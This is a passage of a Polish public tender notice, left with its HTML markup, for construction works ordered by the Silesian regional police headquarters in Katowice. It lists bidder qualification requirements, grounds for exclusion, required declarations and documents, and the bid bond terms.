25a ust. 1 ustawy Pzp - dołączenia do oferty oświadczenia ospełnieniu tego warunku - zgodnie ze wzorem stanowiącym załącznik nr 3 i 4 do SIWZ; (2) napodstawie art. 26 ust. 2 ustawy Pzp - przedstawienia przez Wykonawcę, którego oferta zostanienajwyżej oceniona, na wezwanie Zamawiającego, oświadczenia wykonawcy, że skierowanych przezWykonawcę do realizacji zamówienia publicznego w zakresie kierowania robotami budowlanymi wcharakterze kierownika budowy i kierowników robót wskazanych w Rozdziale III pkt 1.2 literze b)SIWZ posiadają wymagane uprawnienia oraz doświadczenie.Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie doudziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówieniawraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: NieInformacje dodatkowe: 2. Zamawiający może, na każdym etapie postępowania, uznać, że wykonawcanie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowychwykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ narealizację zamówienia. 3. Zgodnie z art. 22a ust. 1 i 2 ustawy prawo zamówień publicznych,Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać nazdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnegołączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacjiinnych podmiotów musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponowałniezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tychpodmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 4.Zgodnie z art. 22a ust. 3 ustawy prawo zamówień publicznych, Zamawiający oceni czy udostępnianeprzez inne podmioty zdolności techniczne lub zawodowe pozwalają na wykazanie przez wykonawcęspełnienia warunków udziału w postępowaniu oraz będzie badał czy nie zachodzą wobec tegopodmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt. 13 - 22 i ust. 5 pkt. 1 i 8. 5.Zgodnie z art. 22a ust. 4 ustawy prawo zamówień publicznych, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji lub doświadczenia, wykonawcy mogą polegać nazdolnościach innych podmiotów jeśli podmioty te realizują roboty budowlane lub usługi do realizacjiktórych te zdolności są wymagane. Z zastrzeżeniem art. 36a ust. 1 ustawy Pzp tj. Wykonawca możepowierzyć wykonanie części zamówienia podwykonawców. 6. Zamawiający dokona oceny spełnieniawarunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń wformie spełnia, nie spełnia. Wykonawca niespełniający warunków udziału w postępowaniu zostaniewykluczony zgodnie z art. 24 ust. 1 i/lub ust. 5 pkt. 1, i 8 ustawy Pzp. 7. Aktualność dokumentówskładanych do oferty, a określonych w rozdziale IV.A SIWZ: 7.1 Za aktualny zostanie uznany zarównodokument wystawiony odpowiednio nie wcześniej niż 3 m-ce i 6 m-cy przed upływem terminuskładania ofert, jak również dokument wystawiony w okresie wcześniejszym, jeżeli istnienieokreślonych w nim okoliczności potwierdzone zostanie przez właściwy organ w wymaganymterminie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">2 informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albowniosków o dopuszczenie do udziału w postępowaniu; 3 zaświadczenie właściwego naczelnika urzęduskarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego niewcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie doudziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarłporozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzjiwłaściwego organu; 4 zaświadczenia właściwej terenowej jednostki organizacyjnej ZakładuUbezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lubzdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albowniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, żewykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzjiwłaściwego organu; 5 odpisu z właściwego rejestru lub z centralnej ewidencji i informacji odziałalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celupotwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 6 oświadczeniewykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się ozamówienia publiczne. 7 oświadczenia wykonawcy o braku wydania wobec niego prawomocnegowyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lubskładek na ubezpieczenie społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lubdecyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymiodsetkami lub grzywnami lub zawarcia wiążącego porozumienia w sprawie spłat tych należności. 9Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,zamiast dokumentów, o których mowa w rozdziale IV SIWZ : 9.1 ust. 3 - składa informację zodpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokumentwydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibęlub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albodokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 9.2 ust. 4-6 - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,potwierdzające odpowiednio, że: 9.2.1 nie zalega z opłacaniem podatków, opłat, składek naubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawiespłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskałprzewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu, 9.2.2 nie otwarto jego likwidacji ani nieogłoszono upadłości. 10 Dokumenty, o których mowa w ust. 9.1 i 9.2.2, powinny być wystawione niewcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie doudziału w postępowaniu. Dokument, o którym mowa w ust. 9.2.1, powinien być wystawiony niewcześniej niż 3 miesiące przed upływem tego terminu. 11 Jeżeli w kraju, w którym wykonawca masiedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, niewydaje się dokumentów, o których mowa w ust. 9, zastępuje się je dokumentem zawierającymodpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jegoreprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lubprzed organem sądowym, administracyjnym albo organem samorządu zawodowego lubgospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejscezamieszkania tej osoby. Przepis ust. 10 stosuje się. 12 W przypadku wątpliwości co do treścidokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organówodpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejscezamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczącychtego dokumentu. 13 Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, wodniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, którejdotyczy dokument wskazany w punkcie 3, składa dokument, o którym mowa ww punkcie 9.1 wzakresie określonym w art. 24 ust. 1 pkt 14 i 21. Jeżeli w kraju, w którym miejsce zamieszkania maosoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się godokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organemsądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym zewzględu na miejsce zamieszkania tej osoby. Przepis punktu 10 zdanie pierwsze stosuje się. 13.1 Wprzypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający możezwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokumentdotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu. 14 W celu oceny, czywykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art.22a ustawy, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należytewykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda dokumentów, które określają wszczególności: 14.1 zakres dostępnych wykonawcy zasobów innego podmiotu; 14.2 sposóbwykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówieniapublicznego; 14.3 zakres i okres udziału innego podmiotu przy wykonywaniu zamówieniapublicznego; 14.4 czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu dowarunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lubdoświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 15Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów nazasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotówdokumentów wymienionych w punkcie od 2 - 6 C. W przypadku wskazania przez wykonawcędostępności oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale z wyłączeniempunktów 6,7,8,14 i 15 litera B, w formie elektronicznej pod określonymi adresami internetowymiogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danychwskazane przez wykonawcę oświadczenia lub dokumenty. D. W przypadku wskazania przezwykonawcę oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale z wyłączeniempunktów 6,7,8,14 i 15 litera B, które znajdują się w posiadaniu zamawiającego, w szczególnościoświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy,zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy,korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. E. W przypadku składaniaoferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, każdy zpodmiotów występujących w konsorcjum musi przedłożyć w ofercie dokumenty określone w rozdzialeIV litera B punkt od 2 do 7 oraz od 9 do 15 SIWZ. Dokumenty i oświadczenia wymienione wrozdziale IV litera A oraz IV litera B punkt 1 i 8 mogą przedstawić łącznie. W przypadkudoświadczenia za spełnienie warunku zostanie uznana jeżeli tylko jeden z członków konsorcjum spełnicały warunek wskazany w podpunkcie 1.2 litera a) rozdziale III SIWZ . F. Zamawiający oceni, czyudostępnione wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacjafinansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziałuw postępowaniu. G. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazaniabraku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się naich zasoby, warunków udziału w postępowaniu składa 1. jednolite dokumenty dotyczące tychpodmiotów - należy załączyć do oferty; 2. dokumentów wymienionych w literze B punkcie od 2 do 7niniejszego rozdziału dla tych podmiotów z zastrzeżeniem zapisu art. 26 ust. 2 ustawy Pzp. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1 Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminuskładania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzeniadziałalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejscawykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane należycie,przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przezpodmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń określonych lubciągłych są wykonywane, a jeżeli z uzasadnionej przyczyn o obiektywnym charakterze wykonawcanie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy, w przypadku świadczeńokresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ichnależyte wykonanie powinny być ciągły nadal wykonywanych referencji bądź inne dokumentypotwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przedupływem terminu składania ofert albo wniosków o dopuszczenie udziału w postępowaniu. Wykazmusi potwierdzać spełnienie warunku udziału w postępowaniu w zakresie określonym w rozdziale IIIpunkt 1.2 litera a) do SIWZ Wykaz powinien zostać złożony w formie zgodnej ze wzoremstanowiącym załącznik nr 5 do SIWZ. 8 oświadczam(y), że osoby, które będą uczestniczyć wwykonywaniu zamówienia, posiadają wymagane uprawnienia oraz doświadczenie wskazane wrozdziale III punkt 1.2 litera b) SIWZ. 14 W celu oceny, czy wykonawca polegając na zdolnościachlub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, będzie dysponowałniezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego orazoceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ichzasobów, zamawiający żąda dokumentów, które określają w szczególności: 14.1 zakres dostępnychwykonawcy zasobów innego podmiotu; 14.2 sposób wykorzystania zasobów innego podmiotu, przezwykonawcę, przy wykonywaniu zamówienia publicznego; 14.3 zakres i okres udziału innegopodmiotu przy wykonywaniu zamówienia publicznego; 14.4 czy podmiot, na zdolnościach któregowykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, którychwskazane zdolności dotyczą. 15 Zamawiający żąda od wykonawcy, który polega na zdolnościach lubsytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniudo tych podmiotów dokumentów wymienionych w punkcie od 2 - 6 C. W przypadku wskazania przezwykonawcę dostępności oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale zwyłączeniem punktów 6,7,8,14 i 15 litera B, w formie elektronicznej pod określonymi adresamiinternetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danych wskazane przez wykonawcę oświadczenia lub dokumenty. D. W przypadku wskazaniaprzez wykonawcę oświadczeń lub dokumentów, o których mowa w niniejszym rozdziale zwyłączeniem punktów 6,7,8,14 i 15 litera B, które znajdują się w posiadaniu zamawiającego, wszczególności oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97ust. 1 ustawy, zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i3 ustawy, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. E. W przypadkuskładania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego,każdy z podmiotów występujących w konsorcjum musi przedłożyć w ofercie dokumenty określone wrozdziale IV litera B punkt od 2 do 7 oraz od 9 do 15 SIWZ. Dokumenty i oświadczenia wymienionew rozdziale IV litera A oraz IV litera B punkt 1 i 8 mogą przedstawić łącznie. W przypadkudoświadczenia za spełnienie warunku zostanie uznana jeżeli tylko jeden z członków konsorcjum spełnicały warunek wskazany w podpunkcie 1.2 litera a) rozdziale III SIWZ . F. Zamawiający oceni, czyudostępnione wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacjafinansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziałuw postępowaniu. G. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazaniabraku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się naich zasoby, warunków udziału w postępowaniu składa 1. jednolite dokumenty dotyczące tychpodmiotów - należy załączyć do oferty; 2. dokumentów wymienionych w literze B punkcie od 2 do 7niniejszego rozdziału dla tych podmiotów z zastrzeżeniem zapisu art. 26 ust. 2 ustawy Pzp . </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">1. Formularz ofertowy wypełniony zgodnie z załącznikiem nr 1 do SIWZ. 2. Uproszczony kosztorysofertowy wraz z wykazem materiałów - nie dołączenie do oferty uproszczonego kosztorysuofertowego wraz z wykazem materiałów lub dołączenie niepodpisanego kosztorysu ofertowego przezWykonawcę będzie skutkowało odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp.,ponieważ, niniejszy kosztorys stanowi część oferty. Uproszczone kosztorysy muszą posiadaćpodsumowanie działów z narzutami. 1. W przypadku gdy Wykonawca do oferty przedłoży kosztorysw kalkulacji szczegółowej, będzie on uznany i sprawdzany jak był sporządzony w kalkulacjiuproszczonej. 3. Oświadczenia wymagane na podstawie art. 25a ust. 2 ustawy Pzp, aktualne na dzieńskładania ofert, zgodnie z załącznikiem nr 3 lub 4 do SIWZ. UWAGA: a) Wykonawca, który powołujesię na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczeniaoraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu składa także jednolite dokumenty dotyczące tych podmiotów. b) Wykonawca, który zamierzapowierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobecnich podstaw wykluczenia z udziału w postępowaniu składa jednolite dokumenty dotyczącepodwykonawców. c) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców,jednolity dokument składa każdy z wykonawców wspólnie ubiegających się o zamówienie.Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstawwykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału wpostępowaniu oraz brak podstaw wykluczenia. 3. Oświadczenie, Wykonawcy o udzieleniu gwarancjina wykonane roboty, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub naodrębnym dokumencie. 4. Oświadczenie, że w przypadku nie podania okresu gwarancji na wykonaneroboty budowlane Wykonawca udzieli gwarancji minimalnej tj. 36 miesięcy na wykonane robotybudowlane, złożone na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ lub na odrębnymdokumencie. 5. Oświadczenie Wykonawcy czy powierza podwykonawcy/com wykonaniezamówienia. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Wykonawcawskaże części jaki będzie realizował przy jego/ich udziale wraz z podaniem firm podwykonawcóworaz danych kontaktowych, którzy będą realizować ten zakres, złożone na załączniku nr 1 do SIWZ -formularz ofertowy lub na odrębnym dokumencie. 6. Wykonawca, który polega na zdolnościach lubsytuacji innych podmiotów musi załączyć zobowiązanie tych podmiotów do oddania mu dodyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia zgodnie z treścią punktu 3rozdziału III SIWZ.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">I. Wykonawca musi załączyć do oferty dokumenty wskazane w rozdziale IV litera A. II. Terminyskładania innych dokumentów niż wymienione w punkcie 1: a) Zgodnie z art. 24 ust. 11 Prawazamówień publicznych, Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowejinformacji, o której mowa w art. 86 ust. 5, przekaże zamawiającemu oświadczenie o przynależnościlub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Prawazamówień publicznych. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, żepowiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu oudzielenie zamówienia. b) Pozostałe dokumenty, tj. wymienione w rozdziale IV litera B SIWZwykonawcy będą musieli złożyć na każde żądanie Zamawiającego w terminie przez niego wskazanymi w formie określonej w Rozporządzeniu Ministra Rozwoju z dnia 26 lipca 2016 r. ,,w sprawierodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzieleniezamówienia" (Dz. U. z 2016 r. poz. 1126). III. Wszystkie dokumenty w złożonej ofercie orazuzupełnione na żądanie zamawiającego muszą być opieczętowane pieczątką imienną i podpisane, w przypadku braku pieczątki imiennej osoby, podpis powinien zostać złożony w taki sposób, abyumożliwił identyfikację osoby uprawnionej i opieczętowany pieczęciami firmowymi lub sporządzonena papierze firmowym. Nie dotyczy załączników składanych jako oryginały wystawione i podpisaneprzez uprawnione organy np. KRS, KRK, ZUS, US. Dokumenty wielostronicowe mogą byćopieczętowane pieczątką imienną i podpisane lub podpisane czytelnie przez osoby uprawnione iopieczętowane pieczęciami firmowymi lub sporządzone na papierze firmowym i podpisane czytelnieprzez osoby uprawnione na pierwszej lub ostatniej jego stronie. Dokumenty mogą być składane wformie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wprzypadku składania dokumentów wydanych w języku innym niż język polski, dokumenty te sąskładane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. IV. W przypadkupodpisywania oferty przez osobę niewymienioną w dokumencie określonym w Rozdz. Rozdziale IV.Bpkt 5. niezbędne jest w ofercie pełnomocnictwo dla osoby działającej w imieniu Wykonawcy w formieoryginału lub jego poświadczonej notarialnie kopii. Pełnomocnictwo w sposób jednoznaczny maokreślać, do jakich czynności upoważniona jest osoba podpisująca ofertę. V. W przypadkuWykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego napodstawie art. 23 ust. 2 ustawy Pzp wynika obowiązek ustanowienia pełnomocnika doreprezentowania ich w prowadzonym postępowaniu lub do reprezentowania w postępowaniu izawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w ofercie pełnomocnictwa wformie oryginału lub jego poświadczonej notarialnie kopii albo dołączenie do oferty umowykonsorcjalnej w celu ustalenia podmiotu uprawnionego do występowania w imieniu grupyWykonawców w sposób umożliwiający identyfikację Wykonawców ubiegających się wspólnie oudzielenie zamówienia. Uwaga: W przypadku spółki cywilnej, wspólnicy nie przedstawiają osobnegodokumentu zawierającego pełnomocnictwo, jeżeli uprawnienia do reprezentacji spółki przysługującekażdemu ze wspólników ma wynika z samej umowy spółki cywilnej dołączonej do oferty. VI.Wszelkie miejsca, w których Wykonawca naniósł poprawki, zmiany muszą być parafowane przezosobę podpisującą ofertę (osobę uprawnioną). VII. Wszelkie dokumenty składane na papierzeświatłoczułym uznane zostaną za nieważne. VIII. Zamawiający udzieli wszelkich odpowiedzi nazapytania związane z prowadzonym postępowaniem zgodnie z art. 38 ust. 1 ustawy Prawo zamówieńpublicznych. Jeżeli zapytanie wpłynie do Zamawiającego po upływie terminu, o którym mowa w art.38 ust. 1 ustawy Pzp, Zamawiający może udzielić wyjaśnień albo pozostawić zapytanie bezodpowiedzi. IX. W szczególnie uzasadnionych przypadkach przed upływem terminu do składaniaofert Zamawiający może zmodyfikować treść dokumentu składającego się na SIWZ zgodnie z art. 38ust. 4 ustawy Pzp. X. Oferty są jawne od chwili ich otwarcia. Nie ujawnia się informacji stanowiącychtajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału wpostępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacjestanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa wart. 86 ust. 4 ustawy Pzp. Informacje stanowiące tajemnicę przedsiębiorstwa, winny być stanowićoddzielną część oferty opisaną w następujący sposób ,,INFORMACJE STANOWIĄCE TAJEMNICĘPRZEDSIĘBIORSTWA" i włączone do oferty w dodatkowej zabezpieczonej kopercie.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">ROZDZIAŁ VI - WYMAGANIA DOTYCZĄCE WADIUM Zamawiający żąda wniesienia wadium wwysokości 37000,00 zł. Wadium należy wnieść jak niżej. 1. Wadium należy wnieść w formachokreślonych w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych tj. w pieniądzu, poręczeniachbankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczeniekasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych,poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2014 r. poz.1804 oraz z 2015 r. poz. 978 i 1240). 2. Wadium wnoszone w pieniądzu należy wpłacić przelewem nakonto Zamawiającego tj. Komenda Wojewódzka Policji w Katowicach NBP O/O Katowice nr 91 10101212 0050 5013 9120 0000. Zaleca się umieszczenie dopisku ,,wadium dot. ZP-2380-387-40/2017Wadium musi być wniesione najpóźniej w terminie do dnia 04.10.2017 r. do godziny 12:00 Zaskuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonymterminie tj. 